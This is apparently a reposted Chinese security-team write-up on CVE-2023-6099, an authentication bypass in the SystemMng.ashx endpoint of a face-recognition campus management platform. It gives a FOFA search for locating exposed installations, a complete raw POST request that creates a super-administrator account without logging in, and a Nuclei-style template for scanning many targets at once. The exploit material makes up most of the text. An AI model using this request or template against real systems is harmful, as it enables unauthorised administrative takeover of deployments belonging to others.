message
一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。
Vulnerability recurrence
1.使用以下fofa语句进行资产收集,确认测试目标
title="欢迎使用脸爱云 一脸通智慧管理平台"2.用burp抓包向网站发送如下数据包
POST /SystemMng.ashx HTTP/1.1Host:User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: enContent-Length: 174operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
3.响应200即成功创建账号为数据包内容
登陆后台可以看到自己创建的账号拥有管理员权限
Batch script
id: CVE-2023-6099info:name: 一脸通智慧管理平台权限绕过漏洞author: nihaoseverity: highdescription: '脸爱云一脸通智慧管理平台'tags: 2023metadata:max-request: 3fofa-query: title="欢迎使用脸爱云 一脸通智慧管理平台"verified: truehttp:- method: POSTpath:- "{{BaseURL}}/SystemMng.ashx"headers:Accept-Encoding: gzip, deflateAccept-Language: enbody: "operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators"matchers:- type: dsldsl:- "status_code == 200"
原文始发于微信公众号(揽月安全团队):一脸通智慧管理平台权限绕过漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论